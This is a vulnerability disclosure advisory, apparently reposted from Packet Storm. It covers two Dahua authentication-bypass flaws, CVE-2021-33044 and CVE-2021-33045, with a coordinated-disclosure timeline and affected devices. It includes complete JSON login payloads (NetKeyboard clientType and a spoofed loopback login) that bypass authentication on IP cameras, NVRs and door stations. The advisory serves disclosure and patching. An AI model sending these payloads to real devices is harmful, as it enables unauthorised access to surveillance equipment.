Share
## https://sploitus.com/exploit?id=PACKETSTORM:164423
[STX]  
  
Subject: [Update]: Dahua Authentication bypass (CVE-2021-33044, CVE-2021-33045)  
  
Attack vector: Remote  
Authentication: Anonymous (no credentials needed)  
Researcher: bashis <mcw noemail eu> (2021)  
Limited Disclosure: September 6, 2021  
Full Disclosure: October 6, 2021  
PoC: https://github.com/mcw0/DahuaConsole  
  
-=[Dahua]=-  
Advisory: https://www.dahuasecurity.com/support/cybersecurity/details/957  
Firmware: https://www.dahuasecurity.com/support/downloadCenter/firmware  
  
-=[Timeline]=-  
June 13, 2021: Initiated contact with Dahua PSIRT (CyberSecurity@dahuatech.com)  
June 17, 2021: Sent reminder to Dahua PSIRT  
June 18, 2021: Asked IPVM for help to get in contact with Dahua  
June 18, 2021: Received ACK from IPVM, told they sent note to Dahua  
June 19, 2021: ACK received from Dahua PSIRT, asked for additional details  
June 19, 2021: Additional details including PoC sent  
June 21, 2021: ACK received, vulnerabilites confirmed  
June 23, 2021: Dahua PSIRT asked for "coordinated disclosure"  
June 23, 2021: Confirmed 90 days before my disclosure, said they may release updated firmware anytime from now  
June 24, 2021: Received CVE-2021-33044, I asked about the second CVE  
July 03, 2021: Received CVE-2021-33045, Dahua PSIRT asked again for "coordinated disclosure"  
July 04, 2021: Confirmed "coordinated disclosure", once again  
July 05, 2021: Dahua PSIRT tried convince me for "Full Disclosure" for vendor only, and "Limited Disclosure" for outside world  
July 05, 2021: Disagreed, told I will let Dahua PSIRT read my note before "Limited Disclosure" September 6, 2021.  
"Full Disclosure" will be October 6, 2021,  
August 30, 2021: Dahua PSIRT asked to read my "Limited Disclosure" note  
August 30, 2021: Sent my "Limited Disclosure" note  
September 1, 2021: Dahua PSIRT informing about release of their Security Advisory and firmware updates  
September 1, 2021: Notified Dahua PSIRT that I cannot find firmware updates for my IPC/VTH/VTO devices  
September 2, 2021: Dahua PSIRT pointed oversea website, asked for what models I have so Dahua could release firmware  
September 2, 2021: Refused to provide details, as I do expect me to find firmware on their website  
September 3, 2021: Dahua PSIRT informed that R&D will upload updated firmware in batches  
September 6, 2021: Limited Disclosure  
October 6, 2021: Full Disclosure  
  
  
-=[NetKeyboard Vulnerability]=-  
  
CVE-2021-33044  
  
Vulnerability:  
"clientType": "NetKeyboard",  
Vulnerable device types: IPC/VTH/VTO (tested)  
Vulnerable Firmware: Those devices who do not support "NetKeyboard" functionality (older than June 2021)  
Protocol: DHIP and HTTP/HTTPS  
  
Details:  
Setting above "Vulnerability" on "Vulnerable device types" during 1st or 2nd "global.login" sequence will simply bypass authentication.  
  
Successful bypass returns: {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":<sessionID>}  
  
[Example]  
{  
"method": "global.login",  
"params":  
{  
"userName": "admin",  
"loginType": "Direct",  
"clientType": "NetKeyboard",  
"authorityType": "Default",  
"passwordType": "Default",  
"password": "Not Used"  
},  
"id": 1,  
"session": 0  
}  
  
-=[Loopback Vulnerability]=-  
  
CVE-2021-33045  
  
Vulnerability:  
"ipAddr": "127.0.0.1",  
"loginType": "Loopback",  
"clientType": "Local",  
  
Vulnerable device types: IPC/VTH/VTO/NVR/DVR (tested)  
Vulnerable Firmware: Firmware version older than beginning/mid 2020.  
Protocol: DHIP  
  
Details:  
Setting above "Vulnerability" on "Vulnerable device types" during 1st or 2nd "global.login" sequence pretends that the login request comes from "loopback" and will therefore bypass legitimate authentication.  
  
Successful bypass returns: {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":<sessionID>}  
  
  
[Example]  
Random MD5 with l/p: admin/admin  
{  
"method": "global.login",  
"params":  
{  
"userName": "admin",  
"ipAddr": "127.0.0.1",  
"loginType": "Loopback",  
"clientType": "Local",  
"authorityType": "Default",  
"passwordType": "Default",  
"password": "[REDACTED]"  
},  
"id": 1,  
"session": 0  
}  
  
Plain text with l/p: admin/admin  
{  
"method": "global.login",  
"params":  
{  
"userName": "admin",  
"ipAddr": "127.0.0.1",  
"loginType": "Loopback",  
"clientType": "Local",  
"authorityType": "Default",  
"passwordType": "Plain",  
"password": "admin"  
},  
"id": 1,  
"session": 0  
}  
  
[ETX]